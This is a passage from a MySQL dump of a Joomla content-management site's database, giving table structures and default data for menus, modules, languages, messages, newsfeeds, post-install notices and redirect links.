(`term`), KEY `idx_context` (`context`) ) ENGINE=MEMORY DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_tokens` -- LOCK TABLES `qo1a2_finder_tokens` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_tokens` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_tokens` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_tokens_aggregate` -- DROP TABLE IF EXISTS `qo1a2_finder_tokens_aggregate`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_tokens_aggregate` ( `term_id` int(10) unsigned NOT NULL, `map_suffix` char(1) NOT NULL, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `term_weight` float unsigned NOT NULL, `context` tinyint(1) unsigned NOT NULL DEFAULT '2', `context_weight` float unsigned NOT NULL, `total_weight` float unsigned NOT NULL, `language` char(3) NOT NULL DEFAULT '', KEY `token` (`term`), KEY `keyword_id` (`term_id`) ) ENGINE=MEMORY DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_tokens_aggregate` -- LOCK TABLES `qo1a2_finder_tokens_aggregate` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_tokens_aggregate` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_tokens_aggregate` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_finder_types` -- DROP TABLE IF EXISTS `qo1a2_finder_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_finder_types` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL, `mime` varchar(100) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `title` (`title`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_finder_types` -- LOCK TABLES `qo1a2_finder_types` WRITE; /*!40000 ALTER TABLE `qo1a2_finder_types` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_finder_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_languages` -- DROP TABLE IF EXISTS `qo1a2_languages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_languages` ( `lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT, `lang_code` char(7) NOT NULL, `title` varchar(50) NOT NULL, `title_native` varchar(50) NOT NULL, `sef` varchar(50) NOT NULL, `image` varchar(50) NOT NULL, `description` varchar(512) NOT NULL, `metakey` text NOT NULL, `metadesc` text NOT NULL, `sitename` varchar(1024) NOT NULL DEFAULT '', `published` int(11) NOT NULL DEFAULT '0', `access` int(10) unsigned NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`lang_id`), UNIQUE KEY `idx_sef` (`sef`), UNIQUE KEY `idx_image` (`image`), UNIQUE KEY `idx_langcode` (`lang_code`), KEY `idx_access` (`access`), KEY `idx_ordering` (`ordering`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_languages` -- LOCK TABLES `qo1a2_languages` WRITE; /*!40000 ALTER TABLE `qo1a2_languages` DISABLE KEYS */; INSERT INTO `qo1a2_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','','',1,1,1); /*!40000 ALTER TABLE `qo1a2_languages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_menu` -- DROP TABLE IF EXISTS `qo1a2_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_menu` ( `id` int(11) NOT NULL AUTO_INCREMENT, `menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype', `title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The SEF alias of the menu item.', `note` varchar(255) NOT NULL DEFAULT '', `path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.', `link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.', `type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator', `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.', `parent_id` int(10) unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.', `level` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.', `component_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id', `checked_out` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id', `checked_out_time` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.', `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.', `access` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The access level required to view the menu item.', `img` varchar(255) NOT NULL COMMENT 'The image of the menu item.', `template_style_id` int(10) unsigned NOT NULL DEFAULT '0', `params` text NOT NULL COMMENT 'JSON encoded data for the menu item.', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `home` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.', `language` char(7) NOT NULL DEFAULT '', `client_id` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`,`language`), KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`), KEY `idx_menutype` (`menutype`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_path` (`path`(255)), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=102 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_menu` -- LOCK TABLES `qo1a2_menu` WRITE; /*!40000 ALTER TABLE `qo1a2_menu` DISABLE KEYS */; INSERT INTO `qo1a2_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,49,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,10,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',2,3,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',4,5,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',6,7,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',8,9,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',11,16,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',12,13,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',14,15,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',17,22,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',18,19,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',20,21,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',23,28,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',24,25,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',26,27,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',29,30,0,'*',1),(17,'menu','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',0,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',31,32,0,'*',1),(18,'menu','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',33,38,0,'*',1),(19,'menu','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',34,35,0,'*',1),(20,'menu','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',36,37,0,'*',1),(21,'menu','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',39,40,0,'*',1),(22,'menu','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',1,1,1,28,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',41,42,0,'*',1),(23,'main','com_tags','Tags','','Tags','index.php?option=com_tags','component',0,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',43,44,0,'',1),(24,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',0,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',45,46,0,'*',1),(101,'mainmenu','Home','home','','home','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',47,48,1,'*',0); /*!40000 ALTER TABLE `qo1a2_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_menu_types` -- DROP TABLE IF EXISTS `qo1a2_menu_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_menu_types` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `menutype` varchar(24) NOT NULL, `title` varchar(48) NOT NULL, `description` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `idx_menutype` (`menutype`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_menu_types` -- LOCK TABLES `qo1a2_menu_types` WRITE; /*!40000 ALTER TABLE `qo1a2_menu_types` DISABLE KEYS */; INSERT INTO `qo1a2_menu_types` VALUES (1,'mainmenu','Main Menu','The main menu for the site'); /*!40000 ALTER TABLE `qo1a2_menu_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_messages` -- DROP TABLE IF EXISTS `qo1a2_messages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_messages` ( `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id_from` int(10) unsigned NOT NULL DEFAULT '0', `user_id_to` int(10) unsigned NOT NULL DEFAULT '0', `folder_id` tinyint(3) unsigned NOT NULL DEFAULT '0', `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `state` tinyint(1) NOT NULL DEFAULT '0', `priority` tinyint(1) unsigned NOT NULL DEFAULT '0', `subject` varchar(255) NOT NULL DEFAULT '', `message` text NOT NULL, PRIMARY KEY (`message_id`), KEY `useridto_state` (`user_id_to`,`state`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_messages` -- LOCK TABLES `qo1a2_messages` WRITE; /*!40000 ALTER TABLE `qo1a2_messages` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_messages_cfg` -- DROP TABLE IF EXISTS `qo1a2_messages_cfg`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_messages_cfg` ( `user_id` int(10) unsigned NOT NULL DEFAULT '0', `cfg_name` varchar(100) NOT NULL DEFAULT '', `cfg_value` varchar(255) NOT NULL DEFAULT '', UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_messages_cfg` -- LOCK TABLES `qo1a2_messages_cfg` WRITE; /*!40000 ALTER TABLE `qo1a2_messages_cfg` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_messages_cfg` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_modules` -- DROP TABLE IF EXISTS `qo1a2_modules`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_modules` ( `id` int(11) NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `title` varchar(100) NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `content` text NOT NULL, `ordering` int(11) NOT NULL DEFAULT '0', `position` varchar(50) NOT NULL DEFAULT '', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL DEFAULT '0', `module` varchar(50) DEFAULT NULL, `access` int(10) unsigned NOT NULL DEFAULT '0', `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1', `params` text NOT NULL, `client_id` tinyint(4) NOT NULL DEFAULT '0', `language` char(7) NOT NULL, PRIMARY KEY (`id`), KEY `published` (`published`,`access`), KEY `newsfeeds` (`module`,`published`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=87 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_modules` -- LOCK TABLES `qo1a2_modules` WRITE; /*!40000 ALTER TABLE `qo1a2_modules` DISABLE KEYS */; INSERT INTO `qo1a2_modules` VALUES (1,39,'Main Menu','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"0\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(2,40,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,41,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,42,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,43,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,44,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,45,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,46,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,47,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,48,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,49,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,50,'Login Form','','',7,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'{\"greeting\":\"1\",\"name\":\"0\"}',0,'*'),(17,51,'Breadcrumbs','','',1,'position-2',574,'2014-11-13 14:49:19','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,1,'{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(79,52,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,53,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'); /*!40000 ALTER TABLE `qo1a2_modules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_modules_menu` -- DROP TABLE IF EXISTS `qo1a2_modules_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_modules_menu` ( `moduleid` int(11) NOT NULL DEFAULT '0', `menuid` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`moduleid`,`menuid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_modules_menu` -- LOCK TABLES `qo1a2_modules_menu` WRITE; /*!40000 ALTER TABLE `qo1a2_modules_menu` DISABLE KEYS */; INSERT INTO `qo1a2_modules_menu` VALUES (1,0),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,0),(17,0),(79,0),(86,0); /*!40000 ALTER TABLE `qo1a2_modules_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_newsfeeds` -- DROP TABLE IF EXISTS `qo1a2_newsfeeds`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_newsfeeds` ( `catid` int(11) NOT NULL DEFAULT '0', `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `link` varchar(200) NOT NULL DEFAULT '', `published` tinyint(1) NOT NULL DEFAULT '0', `numarticles` int(10) unsigned NOT NULL DEFAULT '1', `cache_time` int(10) unsigned NOT NULL DEFAULT '3600', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `rtl` tinyint(4) NOT NULL DEFAULT '0', `access` int(10) unsigned NOT NULL DEFAULT '0', `language` char(7) NOT NULL DEFAULT '', `params` text NOT NULL, `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `description` text NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `hits` int(10) unsigned NOT NULL DEFAULT '0', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_newsfeeds` -- LOCK TABLES `qo1a2_newsfeeds` WRITE; /*!40000 ALTER TABLE `qo1a2_newsfeeds` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_newsfeeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_overrider` -- DROP TABLE IF EXISTS `qo1a2_overrider`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_overrider` ( `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `constant` varchar(255) NOT NULL, `string` text NOT NULL, `file` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_overrider` -- LOCK TABLES `qo1a2_overrider` WRITE; /*!40000 ALTER TABLE `qo1a2_overrider` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_overrider` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_postinstall_messages` -- DROP TABLE IF EXISTS `qo1a2_postinstall_messages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_postinstall_messages` ( `postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `extension_id` bigint(20) NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions', `title_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for the title', `description_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for description', `action_key` varchar(255) NOT NULL DEFAULT '', `language_extension` varchar(255) NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys', `language_client_id` tinyint(3) NOT NULL DEFAULT '1', `type` varchar(10) NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action', `action_file` varchar(255) DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method', `action` varchar(255) DEFAULT '' COMMENT 'Action method name or URL', `condition_file` varchar(255) DEFAULT NULL COMMENT 'RAD URI to file holding display condition method', `condition_method` varchar(255) DEFAULT NULL COMMENT 'Display condition method, must return boolean', `version_introduced` varchar(50) NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced', `enabled` tinyint(3) NOT NULL DEFAULT '1', PRIMARY KEY (`postinstall_message_id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_postinstall_messages` -- LOCK TABLES `qo1a2_postinstall_messages` WRITE; /*!40000 ALTER TABLE `qo1a2_postinstall_messages` DISABLE KEYS */; INSERT INTO `qo1a2_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',1),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_WELCOME_BEGINNERS_TITLE','COM_CPANEL_WELCOME_BEGINNERS_MESSAGE','','com_cpanel',1,'message','','','','','3.2.0',1),(4,700,'COM_CPANEL_MSG_PHPVERSION_TITLE','COM_CPANEL_MSG_PHPVERSION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/phpversion.php','admin_postinstall_phpversion_condition','3.2.2',1); /*!40000 ALTER TABLE `qo1a2_postinstall_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_redirect_links` -- DROP TABLE IF EXISTS `qo1a2_redirect_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_redirect_links` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `old_url` varchar(255) NOT NULL, `new_url` varchar(255) NOT NULL, `referer` varchar(150) NOT NULL, `comment` varchar(255) NOT NULL, `hits` int(10) unsigned NOT NULL DEFAULT '0', `published` tinyint(4) NOT NULL, `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), UNIQUE KEY `idx_link_old` (`old_url`), KEY `idx_link_modifed` (`modified_date`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_redirect_links` -- 